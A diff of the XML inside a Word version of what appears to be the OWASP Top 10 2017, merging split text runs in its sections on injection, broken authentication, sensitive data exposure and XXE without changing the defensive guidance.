-              <w:t>Injection flaws are very prevalent, particularly in legacy code. Injection vulnerabilities are often found in S</w:t>
-            </w:r>
-            <w:r>
-              <w:t>QL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP headers, expression languages, and ORM queries. Injection flaws are easy to discover when examining code. Scanners and fuzzers can help attackers find injection flaws.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Injection can result i</w:t>
-            </w:r>
-            <w:r>
-              <w:t>n data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover. The business impact depends on the protection needs of your application and data.</w:t>
+              <w:t>Injection flaws are very prevalent, particularly in legacy code. Injection vulnerabilities are often found in SQL, LDAP, XPath, or NoSQL queries; OS commands; XML parsers, SMTP headers, expression languages, and ORM queries. Injection flaws are easy to discover when examining code. Scanners and fuzzers can help attackers find injection flaws.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Injection can result in data loss or corruption, lack of accountability, or denial of access. Injection can sometimes lead to complete host takeover. The business impact depends on the protection needs of your application and data.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4758,10 +4521,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>An application</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is vulnerable to attack when:</w:t>
+        <w:t>An application is vulnerable to attack when:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4797,10 +4557,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Hostile data is</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> used within object-relational mapping (ORM) search parameters to extract additional, sensitive records.</w:t>
+        <w:t>Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4812,10 +4569,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Hostile data is directly used or concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or s</w:t>
-      </w:r>
-      <w:r>
-        <w:t>tored procedures.</w:t>
+        <w:t>Hostile data is directly used or concatenated, such that the SQL or command contains both structure and hostile data in dynamic queries, commands, or stored procedures.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4827,10 +4581,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Some of the more common injections are SQL, NoSQL, OS command, ORM, LDAP, and Expression Language (EL) or OGNL injection. The concept is identical among all interpreters. Source code review is the best method of detecting if your applicat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ions are vulnerable to injections, closely followed by thorough automated testing of all parameters, headers, URL, cookies, JSON, SOAP, and XML data inputs. Organizations can include static source (</w:t>
+        <w:t>Some of the more common injections are SQL, NoSQL, OS command, ORM, LDAP, and Expression Language (EL) or OGNL injection. The concept is identical among all interpreters. Source code review is the best method of detecting if your applications are vulnerable to injections, closely followed by thorough automated testing of all parameters, headers, URL, cookies, JSON, SOAP, and XML data inputs. Organizations can include static source (</w:t>
       </w:r>
       <w:hyperlink r:id="rId45">
         <w:r>
@@ -4852,10 +4603,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>) tools into the CI/CD pipeline to identify newly introduced injection flaws prior to production deployment</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>) tools into the CI/CD pipeline to identify newly introduced injection flaws prior to production deployment.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4894,10 +4642,7 @@
         <w:t>Note</w:t>
       </w:r>
       <w:r>
-        <w:t>: When parameterized, stored procedures can still introduce SQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> injection if PL/SQL or T-SQL concatenates queries and data, or executes hostile data with EXECUTE IMMEDIATE or exec().</w:t>
+        <w:t>: When parameterized, stored procedures can still introduce SQL injection if PL/SQL or T-SQL concatenates queries and data, or executes hostile data with EXECUTE IMMEDIATE or exec().</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4909,10 +4654,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Use positive or "whitelist" server-side input validation, but this is not a complete defense as many applications require special charac</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ters, such as text areas or APIs for mobile applications.</w:t>
+        <w:t>Use positive or "whitelist" server-side input validation, but this is not a complete defense as many applications require special characters, such as text areas or APIs for mobile applications.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4933,10 +4675,7 @@
         <w:t>Note</w:t>
       </w:r>
       <w:r>
-        <w:t>: SQL structure such as table names, column names, and so on cannot be escaped,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> and thus user-supplied structure names are dangerous. This is a common issue in report-writing software.</w:t>
+        <w:t>: SQL structure such as table names, column names, and so on cannot be escaped, and thus user-supplied structure names are dangerous. This is a common issue in report-writing software.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4973,10 +4712,7 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:t>An application uses untrusted data in the construction of the following vulnerable SQL call:</w:t>
+        <w:t>: An application uses untrusted data in the construction of the following vulnerable SQL call:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5001,10 +4737,7 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t>: Similarly, an application’s blind trust in frameworks may r</w:t>
-      </w:r>
-      <w:r>
-        <w:t>esult in queries that are still vulnerable, (e.g. Hibernate Query Language (HQL)):</w:t>
+        <w:t>: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g. Hibernate Query Language (HQL)):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5042,10 +4775,7 @@
         <w:pStyle w:val="BodyText"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">This changes the meaning of both queries to return all the records from the accounts table. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>More dangerous attacks could modify or delete data, or even invoke stored procedures.</w:t>
+        <w:t>This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify or delete data, or even invoke stored procedures.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5154,13 +4884,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">OWASP </w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>Cheat Sheet: Injection Prevention</w:t>
+          <w:t>OWASP Cheat Sheet: Injection Prevention</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -5272,13 +4996,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-89: SQL Inject</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ion</w:t>
+          <w:t>CWE-89: SQL Injection</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -5460,42 +5178,33 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force, and dictionary attack tools. Session management attacks are well</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> understood, particularly in relation to unexpired session tokens.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>The prevalence of broken authentication is widespread due to the design and implementation of most identity and access controls. Session management is the bedrock of authentication and acce</w:t>
-            </w:r>
-            <w:r>
-              <w:t>ss controls, and is present in all stateful apps. Attackers can detect broken authentication using manual means and exploit them using automated tools with password lists and dictionary attacks. </w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Attackers only have to gain access to a few accounts, or jus</w:t>
-            </w:r>
-            <w:r>
-              <w:t>t one admin account to compromise the system. Depending on the domain of the application, this may allow money laundering, social security fraud, and identity theft, or disclose legally protected highly sensitive information.</w:t>
+              <w:t>Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force, and dictionary attack tools. Session management attacks are well understood, particularly in relation to unexpired session tokens.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>The prevalence of broken authentication is widespread due to the design and implementation of most identity and access controls. Session management is the bedrock of authentication and access controls, and is present in all stateful apps. Attackers can detect broken authentication using manual means and exploit them using automated tools with password lists and dictionary attacks. </w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Attackers only have to gain access to a few accounts, or just one admin account to compromise the system. Depending on the domain of the application, this may allow money laundering, social security fraud, and identity theft, or disclose legally protected highly sensitive information.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5508,10 +5217,7 @@
       <w:bookmarkStart w:id="45" w:name="is-the-application-vulnerable-1"/>
       <w:bookmarkEnd w:id="45"/>
       <w:r>
-        <w:t>Is the Application Vulnerable</w:t>
-      </w:r>
-      <w:r>
-        <w:t>?</w:t>
+        <w:t>Is the Application Vulnerable?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5574,10 +5280,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Permits default, weak, or well-known passwords, such a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>s "Password1" or "admin/admin“.</w:t>
+        <w:t>Permits default, weak, or well-known passwords, such as "Password1" or "admin/admin“.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5607,13 +5310,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>A3:2017-Sensitive Data Exp</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>osure</w:t>
+        <w:t>A3:2017-Sensitive Data Exposure</w:t>
       </w:r>
       <w:r>
         <w:t>).</w:t>
@@ -5664,10 +5361,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Does not properly invalidate Session IDs. User sessions or authentication tokens (part</w:t>
-      </w:r>
-      <w:r>
-        <w:t>icularly single sign-on (SSO) tokens) aren't properly invalidated during logout or a period of inactivity</w:t>
+        <w:t>Does not properly invalidate Session IDs. User sessions or authentication tokens (particularly single sign-on (SSO) tokens) aren't properly invalidated during logout or a period of inactivity</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5689,10 +5383,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Where possible, implement multi-factor authentication to prevent automated, credential stuffing, brute force, and stolen credential re-</w:t>
-      </w:r>
-      <w:r>
-        <w:t>use attacks.</w:t>
+        <w:t>Where possible, implement multi-factor authentication to prevent automated, credential stuffing, brute force, and stolen credential re-use attacks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5750,10 +5441,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> or o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ther modern, evidence based password policies.</w:t>
+        <w:t xml:space="preserve"> or other modern, evidence based password policies.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5778,10 +5466,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Limit or increasingly delay failed login attempts. Log a</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ll failures and alert administrators when credential stuffing, brute force, other attacks are detected.</w:t>
+        <w:t>Limit or increasingly delay failed login attempts. Log all failures and alert administrators when credential stuffing, brute force, other attacks are detected.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5793,10 +5478,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Use a server-side, secure, built-in session manager that generates a new random session ID with high entropy after login. Session IDs should not be in t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>he URL, be securely stored and invalidated after logout, idle, and absolute timeouts.</w:t>
+        <w:t>Use a server-side, secure, built-in session manager that generates a new random session ID with high entropy after login. Session IDs should not be in the URL, be securely stored and invalidated after logout, idle, and absolute timeouts.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5836,10 +5518,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t>, is a common attack. If an application does not implement automated threat or credential stuffing protections, the application can be used as a password oracle to determine if the credentials are va</w:t>
-      </w:r>
-      <w:r>
-        <w:t>lid.</w:t>
+        <w:t>, is a common attack. If an application does not implement automated threat or credential stuffing protections, the application can be used as a password oracle to determine if the credentials are valid.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5853,10 +5532,7 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t>: Most authentication attacks occur due to the continued use of passwords as a sole factor. Once considered best practices, password rotation and complexity requirements are viewed as encouraging users to use, and reuse, weak passwords. Org</w:t>
-      </w:r>
-      <w:r>
-        <w:t>anizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication.</w:t>
+        <w:t>: Most authentication attacks occur due to the continued use of passwords as a sole factor. Once considered best practices, password rotation and complexity requirements are viewed as encouraging users to use, and reuse, weak passwords. Organizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5870,10 +5546,7 @@
         <w:t>Scenario #3</w:t>
       </w:r>
       <w:r>
-        <w:t>: Application session timeouts aren't set properly. A user uses a public computer to access an application. Instead of selecting “logout” the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and the user is still authenticated.</w:t>
+        <w:t>: Application session timeouts aren't set properly. A user uses a public computer to access an application. Instead of selecting “logout” the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and the user is still authenticated.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6040,13 +5713,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Cheat Sheet: Se</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ssion Management</w:t>
+          <w:t>OWASP Cheat Sheet: Session Management</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -6090,13 +5757,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>NIST 800-63b: 5.1.1 M</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>emorized Secrets - for thorough, modern, evidence based advice on authentication.</w:t>
+          <w:t>NIST 800-63b: 5.1.1 Memorized Secrets - for thorough, modern, evidence based advice on authentication.</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -6130,13 +5791,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-384</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>: Session Fixation</w:t>
+          <w:t>CWE-384: Session Fixation</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -6267,45 +5922,33 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Attackers typically don't break crypto directly. Instead attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user's client, e.g. browser. A manual attack is generally required. Pre</w:t>
-            </w:r>
-            <w:r>
-              <w:t>viously retrieved password databases could be brute forced or cracked by GPUs.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t>Over the last few years, this has been the most common impactful attack. The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generati</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">on and management, and weak algorithm, protocol and cipher usage is common, particularly for data at rest weak password hashing techniques. For data in transit server side weaknesses are mainly easy to detect, but hard for data at rest. The exploitability </w:t>
-            </w:r>
-            <w:r>
-              <w:t>of both varies.</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="Compact"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">Failure frequently compromises all data that should have been protected. Typically, this information includes sensitive personal information (PII) data such as health records, cre-dentials, personal data, credit cards, which often requires </w:t>
-            </w:r>
-            <w:r>
-              <w:t>protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</w:t>
+              <w:t>Attackers typically don't break crypto directly. Instead attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user's client, e.g. browser. A manual attack is generally required. Previously retrieved password databases could be brute forced or cracked by GPUs.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Over the last few years, this has been the most common impactful attack. The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm, protocol and cipher usage is common, particularly for data at rest weak password hashing techniques. For data in transit server side weaknesses are mainly easy to detect, but hard for data at rest. The exploitability of both varies.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="Compact"/>
+            </w:pPr>
+            <w:r>
+              <w:t>Failure frequently compromises all data that should have been protected. Typically, this information includes sensitive personal information (PII) data such as health records, cre-dentials, personal data, credit cards, which often requires protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6326,13 +5969,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> records, personal information and business secrets require extra protection, particularly if that data falls under privacy laws, e.g. EU's General Data Protection Regulation (GDPR), or regulations, e.g. financial data protection such as PCI Data Security </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Standard (PCI DSS). For all such data:</w:t>
+        <w:t>The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, personal information and business secrets require extra protection, particularly if that data falls under privacy laws, e.g. EU's General Data Protection Regulation (GDPR), or regulations, e.g. financial data protection such as PCI Data Security Standard (PCI DSS). For all such data:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6344,10 +5981,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Is any data transmitted in clear text? This concerns any proto-col, e.g. http, smtp , ftp. External internet traffic is especially dangerous, but verify also all internal traffic e.g. between load balancers, gateways,</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> web servers or back end systems.</w:t>
+        <w:t>Is any data transmitted in clear text? This concerns any proto-col, e.g. http, smtp , ftp. External internet traffic is especially dangerous, but verify also all internal traffic e.g. between load balancers, gateways, web servers or back end systems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6407,10 +6041,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Does the user agent (e.g. app, mai</w:t>
-      </w:r>
-      <w:r>
-        <w:t>l client) not verify if the received server certificate is valid.</w:t>
+        <w:t>Does the user agent (e.g. app, mail client) not verify if the received server certificate is valid.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6447,10 +6078,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Do the following, at a minimum and consult the references</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
+        <w:t>Do the following, at a minimum and consult the references:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6487,10 +6115,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Don't store sensitive data unnecessarily. Dis</w:t>
-      </w:r>
-      <w:r>
-        <w:t>card it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data that is not retained cannot be stolen.</w:t>
+        <w:t>Don't store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data that is not retained cannot be stolen.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6514,10 +6139,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Ensure up-to-date and strong standard algorithms, protocols, keys and proper </w:t>
-      </w:r>
-      <w:r>
-        <w:t>key management is in place.</w:t>
+        <w:t>Ensure up-to-date and strong standard algorithms, protocols, keys and proper key management is in place.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6529,10 +6151,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Encrypt all data in transit with secure protocols such as TLS with perfect forward secrecy (PFS) ciphers, cipher prioritization by the server, and secure parameters. Enforce encryption using directives like HTTP Strict Transport</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Security (HSTS).</w:t>
+        <w:t>Encrypt all data in transit with secure protocols such as TLS with perfect forward secrecy (PFS) ciphers, cipher prioritization by the server, and secure parameters. Enforce encryption using directives like HTTP Strict Transport Security (HSTS).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6622,10 +6241,7 @@
       <w:bookmarkStart w:id="55" w:name="example-attack-scenarios-2"/>
       <w:bookmarkEnd w:id="55"/>
       <w:r>
-        <w:t>Example Attack</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Scenarios</w:t>
+        <w:t>Example Attack Scenarios</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6639,10 +6255,7 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>: An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear tex</w:t>
-      </w:r>
-      <w:r>
-        <w:t>t. </w:t>
+        <w:t>: An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6656,10 +6269,7 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t>: A site doesn't use or enforce TLS for all pages or supports weak encryption. An attacker monitors network traffic, strips the TLS (e.g. at an open wireless network), intercepts requests, and steals the user's session cookie. The attacker t</w:t>
-      </w:r>
-      <w:r>
-        <w:t>hen replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above they could alter all transported data, e.g. the recipient of a money transfer.</w:t>
+        <w:t>: A site doesn't use or enforce TLS for all pages or supports weak encryption. An attacker monitors network traffic, strips the TLS (e.g. at an open wireless network), intercepts requests, and steals the user's session cookie. The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above they could alter all transported data, e.g. the recipient of a money transfer.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6673,13 +6283,7 @@
         <w:t>Scenario #3</w:t>
       </w:r>
       <w:r>
-        <w:t>: The password database u</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ses unsalted or simple hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes. Hashes generated by simple or fast h</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ash functions may be cracked by GPUs, even if they were salted.</w:t>
+        <w:t>: The password database uses unsalted or simple hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes. Hashes generated by simple or fast hash functions may be cracked by GPUs, even if they were salted.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6739,13 +6343,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Cheat Sheet: Transport Layer</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t xml:space="preserve"> Protection</w:t>
+          <w:t>OWASP Cheat Sheet: Transport Layer Protection</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -6779,13 +6377,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Cheat Sheet: Password Storag</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>e</w:t>
+          <w:t>OWASP Cheat Sheet: Password Storage</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -6936,13 +6528,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-319: Clear</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>text Transmission of Sensitive Information</w:t>
+          <w:t>CWE-319: Cleartext Transmission of Sensitive Information</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -7034,10 +6620,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Im</w:t>
-            </w:r>
-            <w:r>
-              <w:t>pacts</w:t>
+              <w:t>Impacts</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7117,10 +6700,7 @@
               </w:r>
             </w:hyperlink>
             <w:r>
-              <w:t xml:space="preserve"> tools can discover this issu</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve">e by inspecting dependencies and configuration. </w:t>
+              <w:t xml:space="preserve"> tools can discover this issue by inspecting dependencies and configuration. </w:t>
             </w:r>
             <w:hyperlink r:id="rId101">
               <w:r>
@@ -7144,10 +6724,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>These flaws can be used to extract data, e</w:t>
-            </w:r>
-            <w:r>
-              <w:t>xecute a remote request from the server, scan internal systems, perform a denial-of-service attack, and other attacks. The business impact depends on the protection needs of all affected application and data.</w:t>
+              <w:t>These flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, and other attacks. The business impact depends on the protection needs of all affected application and data.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7168,10 +6745,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Applications an</w:t>
-      </w:r>
-      <w:r>
-        <w:t>d in particular XML-based web services or downstream integrations might be vulnerable to attack if:</w:t>
+        <w:t>Applications and in particular XML-based web services or downstream integrations might be vulnerable to attack if:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7183,10 +6757,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Your application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents, which is then parsed </w:t>
-      </w:r>
-      <w:r>
-        <w:t>by an XML processor.</w:t>
+        <w:t>Your application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents, which is then parsed by an XML processor.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7209,10 +6780,7 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> (DTDs) enabled. As the exact mechanism for disabling</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> DTD processing varies by processor, it is good practice to consult a reference such as the </w:t>
+        <w:t xml:space="preserve"> (DTDs) enabled. As the exact mechanism for disabling DTD processing varies by processor, it is good practice to consult a reference such as the </w:t>
       </w:r>
       <w:hyperlink r:id="rId103">
         <w:r>
@@ -7247,10 +6815,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">If your application uses SOAP prior to version 1.2, it is likely susceptible to </w:t>
-      </w:r>
